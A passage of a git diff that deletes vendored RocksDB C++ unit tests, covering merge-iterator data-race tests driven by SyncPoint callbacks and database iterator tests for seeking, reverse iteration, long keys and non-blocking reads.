-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "b");
-  ASSERT_EQ(db_iter_->value().ToString(), "5");
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "a");
-  ASSERT_EQ(db_iter_->value().ToString(), "4");
-}
-
-TEST_F(DBIterWithMergeIterTest, InnerMergeIteratorDataRace1) {
-  // Test Prev() when one child iterator is at its end but more rows
-  // are added.
-  db_iter_->Seek("f");
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "f");
-  ASSERT_EQ(db_iter_->value().ToString(), "2");
-
-  // Test call back inserts a key in the end of the mem table after
-  // MergeIterator::Prev() realized the mem table iterator is at its end
-  // and before an SeekToLast() is called.
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "MergeIterator::Prev:BeforeSeekToLast",
-      [&](void* arg) { internal_iter2_->Add("z", kTypeValue, "7", 12u); });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "d");
-  ASSERT_EQ(db_iter_->value().ToString(), "7");
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "c");
-  ASSERT_EQ(db_iter_->value().ToString(), "6");
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "b");
-  ASSERT_EQ(db_iter_->value().ToString(), "5");
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "a");
-  ASSERT_EQ(db_iter_->value().ToString(), "4");
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-TEST_F(DBIterWithMergeIterTest, InnerMergeIteratorDataRace2) {
-  // Test Prev() when one child iterator is at its end but more rows
-  // are added.
-  db_iter_->Seek("f");
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "f");
-  ASSERT_EQ(db_iter_->value().ToString(), "2");
-
-  // Test call back inserts entries for update a key in the end of the
-  // mem table after MergeIterator::Prev() realized the mem tableiterator is at
-  // its end and before an SeekToLast() is called.
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "MergeIterator::Prev:BeforeSeekToLast", [&](void* arg) {
-        internal_iter2_->Add("z", kTypeValue, "7", 12u);
-        internal_iter2_->Add("z", kTypeValue, "7", 11u);
-      });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "d");
-  ASSERT_EQ(db_iter_->value().ToString(), "7");
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "c");
-  ASSERT_EQ(db_iter_->value().ToString(), "6");
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "b");
-  ASSERT_EQ(db_iter_->value().ToString(), "5");
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "a");
-  ASSERT_EQ(db_iter_->value().ToString(), "4");
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-TEST_F(DBIterWithMergeIterTest, InnerMergeIteratorDataRace3) {
-  // Test Prev() when one child iterator is at its end but more rows
-  // are added and max_skipped is triggered.
-  db_iter_->Seek("f");
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "f");
-  ASSERT_EQ(db_iter_->value().ToString(), "2");
-
-  // Test call back inserts entries for update a key in the end of the
-  // mem table after MergeIterator::Prev() realized the mem table iterator is at
-  // its end and before an SeekToLast() is called.
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "MergeIterator::Prev:BeforeSeekToLast", [&](void* arg) {
-        internal_iter2_->Add("z", kTypeValue, "7", 16u, true);
-        internal_iter2_->Add("z", kTypeValue, "7", 15u, true);
-        internal_iter2_->Add("z", kTypeValue, "7", 14u, true);
-        internal_iter2_->Add("z", kTypeValue, "7", 13u, true);
-        internal_iter2_->Add("z", kTypeValue, "7", 12u, true);
-        internal_iter2_->Add("z", kTypeValue, "7", 11u, true);
-      });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "d");
-  ASSERT_EQ(db_iter_->value().ToString(), "7");
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "c");
-  ASSERT_EQ(db_iter_->value().ToString(), "6");
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "b");
-  ASSERT_EQ(db_iter_->value().ToString(), "5");
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "a");
-  ASSERT_EQ(db_iter_->value().ToString(), "4");
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-TEST_F(DBIterWithMergeIterTest, InnerMergeIteratorDataRace4) {
-  // Test Prev() when one child iterator has more rows inserted
-  // between Seek() and Prev() when changing directions.
-  internal_iter2_->Add("z", kTypeValue, "9", 4u);
-
-  db_iter_->Seek("g");
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "g");
-  ASSERT_EQ(db_iter_->value().ToString(), "3");
-
-  // Test call back inserts entries for update a key before "z" in
-  // mem table after MergeIterator::Prev() calls mem table iterator's
-  // Seek() and before calling Prev()
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "MergeIterator::Prev:BeforePrev", [&](void* arg) {
-        IteratorWrapper* it = reinterpret_cast<IteratorWrapper*>(arg);
-        if (it->key().starts_with("z")) {
-          internal_iter2_->Add("x", kTypeValue, "7", 16u, true);
-          internal_iter2_->Add("x", kTypeValue, "7", 15u, true);
-          internal_iter2_->Add("x", kTypeValue, "7", 14u, true);
-          internal_iter2_->Add("x", kTypeValue, "7", 13u, true);
-          internal_iter2_->Add("x", kTypeValue, "7", 12u, true);
-          internal_iter2_->Add("x", kTypeValue, "7", 11u, true);
-        }
-      });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "f");
-  ASSERT_EQ(db_iter_->value().ToString(), "2");
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "d");
-  ASSERT_EQ(db_iter_->value().ToString(), "7");
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "c");
-  ASSERT_EQ(db_iter_->value().ToString(), "6");
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "b");
-  ASSERT_EQ(db_iter_->value().ToString(), "5");
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "a");
-  ASSERT_EQ(db_iter_->value().ToString(), "4");
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-TEST_F(DBIterWithMergeIterTest, InnerMergeIteratorDataRace5) {
-  internal_iter2_->Add("z", kTypeValue, "9", 4u);
-
-  // Test Prev() when one child iterator has more rows inserted
-  // between Seek() and Prev() when changing directions.
-  db_iter_->Seek("g");
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "g");
-  ASSERT_EQ(db_iter_->value().ToString(), "3");
-
-  // Test call back inserts entries for update a key before "z" in
-  // mem table after MergeIterator::Prev() calls mem table iterator's
-  // Seek() and before calling Prev()
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "MergeIterator::Prev:BeforePrev", [&](void* arg) {
-        IteratorWrapper* it = reinterpret_cast<IteratorWrapper*>(arg);
-        if (it->key().starts_with("z")) {
-          internal_iter2_->Add("x", kTypeValue, "7", 16u, true);
-          internal_iter2_->Add("x", kTypeValue, "7", 15u, true);
-        }
-      });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "f");
-  ASSERT_EQ(db_iter_->value().ToString(), "2");
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "d");
-  ASSERT_EQ(db_iter_->value().ToString(), "7");
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "c");
-  ASSERT_EQ(db_iter_->value().ToString(), "6");
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "b");
-  ASSERT_EQ(db_iter_->value().ToString(), "5");
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "a");
-  ASSERT_EQ(db_iter_->value().ToString(), "4");
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-TEST_F(DBIterWithMergeIterTest, InnerMergeIteratorDataRace6) {
-  internal_iter2_->Add("z", kTypeValue, "9", 4u);
-
-  // Test Prev() when one child iterator has more rows inserted
-  // between Seek() and Prev() when changing directions.
-  db_iter_->Seek("g");
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "g");
-  ASSERT_EQ(db_iter_->value().ToString(), "3");
-
-  // Test call back inserts an entry for update a key before "z" in
-  // mem table after MergeIterator::Prev() calls mem table iterator's
-  // Seek() and before calling Prev()
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "MergeIterator::Prev:BeforePrev", [&](void* arg) {
-        IteratorWrapper* it = reinterpret_cast<IteratorWrapper*>(arg);
-        if (it->key().starts_with("z")) {
-          internal_iter2_->Add("x", kTypeValue, "7", 16u, true);
-        }
-      });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "f");
-  ASSERT_EQ(db_iter_->value().ToString(), "2");
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "d");
-  ASSERT_EQ(db_iter_->value().ToString(), "7");
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "c");
-  ASSERT_EQ(db_iter_->value().ToString(), "6");
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "b");
-  ASSERT_EQ(db_iter_->value().ToString(), "5");
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "a");
-  ASSERT_EQ(db_iter_->value().ToString(), "4");
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-TEST_F(DBIterWithMergeIterTest, InnerMergeIteratorDataRace7) {
-  internal_iter1_->Add("u", kTypeValue, "10", 4u);
-  internal_iter1_->Add("v", kTypeValue, "11", 4u);
-  internal_iter1_->Add("w", kTypeValue, "12", 4u);
-  internal_iter2_->Add("z", kTypeValue, "9", 4u);
-
-  // Test Prev() when one child iterator has more rows inserted
-  // between Seek() and Prev() when changing directions.
-  db_iter_->Seek("g");
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "g");
-  ASSERT_EQ(db_iter_->value().ToString(), "3");
-
-  // Test call back inserts entries for update a key before "z" in
-  // mem table after MergeIterator::Prev() calls mem table iterator's
-  // Seek() and before calling Prev()
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "MergeIterator::Prev:BeforePrev", [&](void* arg) {
-        IteratorWrapper* it = reinterpret_cast<IteratorWrapper*>(arg);
-        if (it->key().starts_with("z")) {
-          internal_iter2_->Add("x", kTypeValue, "7", 16u, true);
-          internal_iter2_->Add("x", kTypeValue, "7", 15u, true);
-          internal_iter2_->Add("x", kTypeValue, "7", 14u, true);
-          internal_iter2_->Add("x", kTypeValue, "7", 13u, true);
-          internal_iter2_->Add("x", kTypeValue, "7", 12u, true);
-          internal_iter2_->Add("x", kTypeValue, "7", 11u, true);
-        }
-      });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "f");
-  ASSERT_EQ(db_iter_->value().ToString(), "2");
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "d");
-  ASSERT_EQ(db_iter_->value().ToString(), "7");
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "c");
-  ASSERT_EQ(db_iter_->value().ToString(), "6");
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "b");
-  ASSERT_EQ(db_iter_->value().ToString(), "5");
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "a");
-  ASSERT_EQ(db_iter_->value().ToString(), "4");
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-TEST_F(DBIterWithMergeIterTest, InnerMergeIteratorDataRace8) {
-  // internal_iter1_: a, f, g
-  // internal_iter2_: a, b, c, d, adding (z)
-  internal_iter2_->Add("z", kTypeValue, "9", 4u);
-
-  // Test Prev() when one child iterator has more rows inserted
-  // between Seek() and Prev() when changing directions.
-  db_iter_->Seek("g");
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "g");
-  ASSERT_EQ(db_iter_->value().ToString(), "3");
-
-  // Test call back inserts two keys before "z" in mem table after
-  // MergeIterator::Prev() calls mem table iterator's Seek() and
-  // before calling Prev()
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "MergeIterator::Prev:BeforePrev", [&](void* arg) {
-        IteratorWrapper* it = reinterpret_cast<IteratorWrapper*>(arg);
-        if (it->key().starts_with("z")) {
-          internal_iter2_->Add("x", kTypeValue, "7", 16u, true);
-          internal_iter2_->Add("y", kTypeValue, "7", 17u, true);
-        }
-      });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "f");
-  ASSERT_EQ(db_iter_->value().ToString(), "2");
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "d");
-  ASSERT_EQ(db_iter_->value().ToString(), "7");
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/db_iterator_test.cc b/thirdparty/rocksdb/db/db_iterator_test.cc
deleted file mode 100644
index d3bd164..0000000
--- a/thirdparty/rocksdb/db/db_iterator_test.cc
+++ /dev/null
@@ -1,1988 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include <functional>
-
-#include "db/db_test_util.h"
-#include "port/port.h"
-#include "port/stack_trace.h"
-#include "rocksdb/iostats_context.h"
-#include "rocksdb/perf_context.h"
-
-namespace rocksdb {
-
-class DBIteratorTest : public DBTestBase {
- public:
-  DBIteratorTest() : DBTestBase("/db_iterator_test") {}
-};
-
-class FlushBlockEveryKeyPolicy : public FlushBlockPolicy {
- public:
-  virtual bool Update(const Slice& key, const Slice& value) override {
-    if (!start_) {
-      start_ = true;
-      return false;
-    }
-    return true;
-  }
- private:
-  bool start_ = false;
-};
-
-class FlushBlockEveryKeyPolicyFactory : public FlushBlockPolicyFactory {
- public:
-  explicit FlushBlockEveryKeyPolicyFactory() {}
-
-  const char* Name() const override {
-    return "FlushBlockEveryKeyPolicyFactory";
-  }
-
-  FlushBlockPolicy* NewFlushBlockPolicy(
-    const BlockBasedTableOptions& table_options,
-    const BlockBuilder& data_block_builder) const override {
-    return new FlushBlockEveryKeyPolicy;
-  }
-};
-
-TEST_F(DBIteratorTest, IteratorProperty) {
-  // The test needs to be changed if kPersistedTier is supported in iterator.
-  Options options = CurrentOptions();
-  CreateAndReopenWithCF({"pikachu"}, options);
-  Put(1, "1", "2");
-  ReadOptions ropt;
-  ropt.pin_data = false;
-  {
-    unique_ptr<Iterator> iter(db_->NewIterator(ropt, handles_[1]));
-    iter->SeekToFirst();
-    std::string prop_value;
-    ASSERT_NOK(iter->GetProperty("non_existing.value", &prop_value));
-    ASSERT_OK(iter->GetProperty("rocksdb.iterator.is-key-pinned", &prop_value));
-    ASSERT_EQ("0", prop_value);
-    iter->Next();
-    ASSERT_OK(iter->GetProperty("rocksdb.iterator.is-key-pinned", &prop_value));
-    ASSERT_EQ("Iterator is not valid.", prop_value);
-  }
-  Close();
-}
-
-TEST_F(DBIteratorTest, PersistedTierOnIterator) {
-  // The test needs to be changed if kPersistedTier is supported in iterator.
-  Options options = CurrentOptions();
-  CreateAndReopenWithCF({"pikachu"}, options);
-  ReadOptions ropt;
-  ropt.read_tier = kPersistedTier;
-
-  auto* iter = db_->NewIterator(ropt, handles_[1]);
-  ASSERT_TRUE(iter->status().IsNotSupported());
-  delete iter;
-
-  std::vector<Iterator*> iters;
-  ASSERT_TRUE(db_->NewIterators(ropt, {handles_[1]}, &iters).IsNotSupported());
-  Close();
-}
-
-TEST_F(DBIteratorTest, NonBlockingIteration) {
-  do {
-    ReadOptions non_blocking_opts, regular_opts;
-    Options options = CurrentOptions();
-    options.statistics = rocksdb::CreateDBStatistics();
-    non_blocking_opts.read_tier = kBlockCacheTier;
-    CreateAndReopenWithCF({"pikachu"}, options);
-    // write one kv to the database.
-    ASSERT_OK(Put(1, "a", "b"));
-
-    // scan using non-blocking iterator. We should find it because
-    // it is in memtable.
-    Iterator* iter = db_->NewIterator(non_blocking_opts, handles_[1]);
-    int count = 0;
-    for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-      ASSERT_OK(iter->status());
-      count++;
-    }
-    ASSERT_EQ(count, 1);
-    delete iter;
-
-    // flush memtable to storage. Now, the key should not be in the
-    // memtable neither in the block cache.
-    ASSERT_OK(Flush(1));
-
-    // verify that a non-blocking iterator does not find any
-    // kvs. Neither does it do any IOs to storage.
-    uint64_t numopen = TestGetTickerCount(options, NO_FILE_OPENS);
-    uint64_t cache_added = TestGetTickerCount(options, BLOCK_CACHE_ADD);
-    iter = db_->NewIterator(non_blocking_opts, handles_[1]);
-    count = 0;
-    for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-      count++;
-    }
-    ASSERT_EQ(count, 0);
-    ASSERT_TRUE(iter->status().IsIncomplete());
-    ASSERT_EQ(numopen, TestGetTickerCount(options, NO_FILE_OPENS));
-    ASSERT_EQ(cache_added, TestGetTickerCount(options, BLOCK_CACHE_ADD));
-    delete iter;
-
-    // read in the specified block via a regular get
-    ASSERT_EQ(Get(1, "a"), "b");
-
-    // verify that we can find it via a non-blocking scan
-    numopen = TestGetTickerCount(options, NO_FILE_OPENS);
-    cache_added = TestGetTickerCount(options, BLOCK_CACHE_ADD);
-    iter = db_->NewIterator(non_blocking_opts, handles_[1]);
-    count = 0;
-    for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-      ASSERT_OK(iter->status());
-      count++;
-    }
-    ASSERT_EQ(count, 1);
-    ASSERT_EQ(numopen, TestGetTickerCount(options, NO_FILE_OPENS));
-    ASSERT_EQ(cache_added, TestGetTickerCount(options, BLOCK_CACHE_ADD));
-    delete iter;
-
-    // This test verifies block cache behaviors, which is not used by plain
-    // table format.
-    // Exclude kHashCuckoo as it does not support iteration currently
-  } while (ChangeOptions(kSkipPlainTable | kSkipNoSeekToLast | kSkipHashCuckoo |
-                         kSkipMmapReads));
-}
-
-#ifndef ROCKSDB_LITE
-TEST_F(DBIteratorTest, ManagedNonBlockingIteration) {
-  do {
-    ReadOptions non_blocking_opts, regular_opts;
-    Options options = CurrentOptions();
-    options.statistics = rocksdb::CreateDBStatistics();
-    non_blocking_opts.read_tier = kBlockCacheTier;
-    non_blocking_opts.managed = true;
-    CreateAndReopenWithCF({"pikachu"}, options);
-    // write one kv to the database.
-    ASSERT_OK(Put(1, "a", "b"));
-
-    // scan using non-blocking iterator. We should find it because
-    // it is in memtable.
-    Iterator* iter = db_->NewIterator(non_blocking_opts, handles_[1]);
-    int count = 0;
-    for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-      ASSERT_OK(iter->status());
-      count++;
-    }
-    ASSERT_EQ(count, 1);
-    delete iter;
-
-    // flush memtable to storage. Now, the key should not be in the
-    // memtable neither in the block cache.
-    ASSERT_OK(Flush(1));
-
-    // verify that a non-blocking iterator does not find any
-    // kvs. Neither does it do any IOs to storage.
-    int64_t numopen = TestGetTickerCount(options, NO_FILE_OPENS);
-    int64_t cache_added = TestGetTickerCount(options, BLOCK_CACHE_ADD);
-    iter = db_->NewIterator(non_blocking_opts, handles_[1]);
-    count = 0;
-    for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-      count++;
-    }
-    ASSERT_EQ(count, 0);
-    ASSERT_TRUE(iter->status().IsIncomplete());
-    ASSERT_EQ(numopen, TestGetTickerCount(options, NO_FILE_OPENS));
-    ASSERT_EQ(cache_added, TestGetTickerCount(options, BLOCK_CACHE_ADD));
-    delete iter;
-
-    // read in the specified block via a regular get
-    ASSERT_EQ(Get(1, "a"), "b");
-
-    // verify that we can find it via a non-blocking scan
-    numopen = TestGetTickerCount(options, NO_FILE_OPENS);
-    cache_added = TestGetTickerCount(options, BLOCK_CACHE_ADD);
-    iter = db_->NewIterator(non_blocking_opts, handles_[1]);
-    count = 0;
-    for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-      ASSERT_OK(iter->status());
-      count++;
-    }
-    ASSERT_EQ(count, 1);
-    ASSERT_EQ(numopen, TestGetTickerCount(options, NO_FILE_OPENS));
-    ASSERT_EQ(cache_added, TestGetTickerCount(options, BLOCK_CACHE_ADD));
-    delete iter;
-
-    // This test verifies block cache behaviors, which is not used by plain
-    // table format.
-    // Exclude kHashCuckoo as it does not support iteration currently
-  } while (ChangeOptions(kSkipPlainTable | kSkipNoSeekToLast | kSkipHashCuckoo |
-                         kSkipMmapReads));
-}
-#endif  // ROCKSDB_LITE
-
-TEST_F(DBIteratorTest, IterSeekBeforePrev) {
-  ASSERT_OK(Put("a", "b"));
-  ASSERT_OK(Put("c", "d"));
-  dbfull()->Flush(FlushOptions());
-  ASSERT_OK(Put("0", "f"));
-  ASSERT_OK(Put("1", "h"));
-  dbfull()->Flush(FlushOptions());
-  ASSERT_OK(Put("2", "j"));
-  auto iter = db_->NewIterator(ReadOptions());
-  iter->Seek(Slice("c"));
-  iter->Prev();
-  iter->Seek(Slice("a"));
-  iter->Prev();
-  delete iter;
-}
-
-TEST_F(DBIteratorTest, IterSeekForPrevBeforeNext) {
-  ASSERT_OK(Put("a", "b"));
-  ASSERT_OK(Put("c", "d"));
-  dbfull()->Flush(FlushOptions());
-  ASSERT_OK(Put("0", "f"));
-  ASSERT_OK(Put("1", "h"));
-  dbfull()->Flush(FlushOptions());
-  ASSERT_OK(Put("2", "j"));
-  auto iter = db_->NewIterator(ReadOptions());
-  iter->SeekForPrev(Slice("0"));
-  iter->Next();
-  iter->SeekForPrev(Slice("1"));
-  iter->Next();
-  delete iter;
-}
-
-namespace {
-std::string MakeLongKey(size_t length, char c) {
-  return std::string(length, c);
-}
-}  // namespace
-
-TEST_F(DBIteratorTest, IterLongKeys) {
-  ASSERT_OK(Put(MakeLongKey(20, 0), "0"));
-  ASSERT_OK(Put(MakeLongKey(32, 2), "2"));
-  ASSERT_OK(Put("a", "b"));
-  dbfull()->Flush(FlushOptions());
-  ASSERT_OK(Put(MakeLongKey(50, 1), "1"));
-  ASSERT_OK(Put(MakeLongKey(127, 3), "3"));
-  ASSERT_OK(Put(MakeLongKey(64, 4), "4"));
-  auto iter = db_->NewIterator(ReadOptions());
-
-  // Create a key that needs to be skipped for Seq too new
-  iter->Seek(MakeLongKey(20, 0));
-  ASSERT_EQ(IterStatus(iter), MakeLongKey(20, 0) + "->0");
-  iter->Next();
-  ASSERT_EQ(IterStatus(iter), MakeLongKey(50, 1) + "->1");
-  iter->Next();
-  ASSERT_EQ(IterStatus(iter), MakeLongKey(32, 2) + "->2");
-  iter->Next();
-  ASSERT_EQ(IterStatus(iter), MakeLongKey(127, 3) + "->3");
-  iter->Next();
-  ASSERT_EQ(IterStatus(iter), MakeLongKey(64, 4) + "->4");
-
-  iter->SeekForPrev(MakeLongKey(127, 3));
-  ASSERT_EQ(IterStatus(iter), MakeLongKey(127, 3) + "->3");
-  iter->Prev();
-  ASSERT_EQ(IterStatus(iter), MakeLongKey(32, 2) + "->2");
-  iter->Prev();
-  ASSERT_EQ(IterStatus(iter), MakeLongKey(50, 1) + "->1");
-  delete iter;
-
-  iter = db_->NewIterator(ReadOptions());
-  iter->Seek(MakeLongKey(50, 1));
-  ASSERT_EQ(IterStatus(iter), MakeLongKey(50, 1) + "->1");
-  iter->Next();
-  ASSERT_EQ(IterStatus(iter), MakeLongKey(32, 2) + "->2");
-  iter->Next();
-  ASSERT_EQ(IterStatus(iter), MakeLongKey(127, 3) + "->3");
-  delete iter;
-}
-
-TEST_F(DBIteratorTest, IterNextWithNewerSeq) {
-  ASSERT_OK(Put("0", "0"));
-  dbfull()->Flush(FlushOptions());
-  ASSERT_OK(Put("a", "b"));
-  ASSERT_OK(Put("c", "d"));
-  ASSERT_OK(Put("d", "e"));
-  auto iter = db_->NewIterator(ReadOptions());
-
-  // Create a key that needs to be skipped for Seq too new
-  for (uint64_t i = 0; i < last_options_.max_sequential_skip_in_iterations + 1;
-       i++) {
-    ASSERT_OK(Put("b", "f"));
-  }
-
-  iter->Seek(Slice("a"));
-  ASSERT_EQ(IterStatus(iter), "a->b");
-  iter->Next();
-  ASSERT_EQ(IterStatus(iter), "c->d");
-  iter->SeekForPrev(Slice("b"));
-  ASSERT_EQ(IterStatus(iter), "a->b");
-  iter->Next();
-  ASSERT_EQ(IterStatus(iter), "c->d");
-
-  delete iter;
-}
-
-TEST_F(DBIteratorTest, IterPrevWithNewerSeq) {
-  ASSERT_OK(Put("0", "0"));
-  dbfull()->Flush(FlushOptions());
-  ASSERT_OK(Put("a", "b"));
-  ASSERT_OK(Put("c", "d"));
-  ASSERT_OK(Put("d", "e"));
-  auto iter = db_->NewIterator(ReadOptions());
-
-  // Create a key that needs to be skipped for Seq too new
-  for (uint64_t i = 0; i < last_options_.max_sequential_skip_in_iterations + 1;
-       i++) {
-    ASSERT_OK(Put("b", "f"));
-  }
-
-  iter->Seek(Slice("d"));
-  ASSERT_EQ(IterStatus(iter), "d->e");
-  iter->Prev();
-  ASSERT_EQ(IterStatus(iter), "c->d");
-  iter->Prev();
-  ASSERT_EQ(IterStatus(iter), "a->b");
-  iter->Prev();
-  iter->SeekForPrev(Slice("d"));
-  ASSERT_EQ(IterStatus(iter), "d->e");
-  iter->Prev();
-  ASSERT_EQ(IterStatus(iter), "c->d");
-  iter->Prev();
-  ASSERT_EQ(IterStatus(iter), "a->b");
-  iter->Prev();
-  delete iter;
-}
-
-TEST_F(DBIteratorTest, IterPrevWithNewerSeq2) {
-  ASSERT_OK(Put("0", "0"));
-  dbfull()->Flush(FlushOptions());
-  ASSERT_OK(Put("a", "b"));
-  ASSERT_OK(Put("c", "d"));
-  ASSERT_OK(Put("e", "f"));
-  auto iter = db_->NewIterator(ReadOptions());
-  auto iter2 = db_->NewIterator(ReadOptions());
-  iter->Seek(Slice("c"));
-  iter2->SeekForPrev(Slice("d"));
-  ASSERT_EQ(IterStatus(iter), "c->d");
-  ASSERT_EQ(IterStatus(iter2), "c->d");
-
-  // Create a key that needs to be skipped for Seq too new
-  for (uint64_t i = 0; i < last_options_.max_sequential_skip_in_iterations + 1;
-       i++) {
-    ASSERT_OK(Put("b", "f"));
-  }
-
-  iter->Prev();
-  ASSERT_EQ(IterStatus(iter), "a->b");
-  iter->Prev();
-  iter2->Prev();
-  ASSERT_EQ(IterStatus(iter2), "a->b");
-  iter2->Prev();
-  delete iter;
-  delete iter2;
-}
-
-TEST_F(DBIteratorTest, IterEmpty) {
-  do {
-    CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
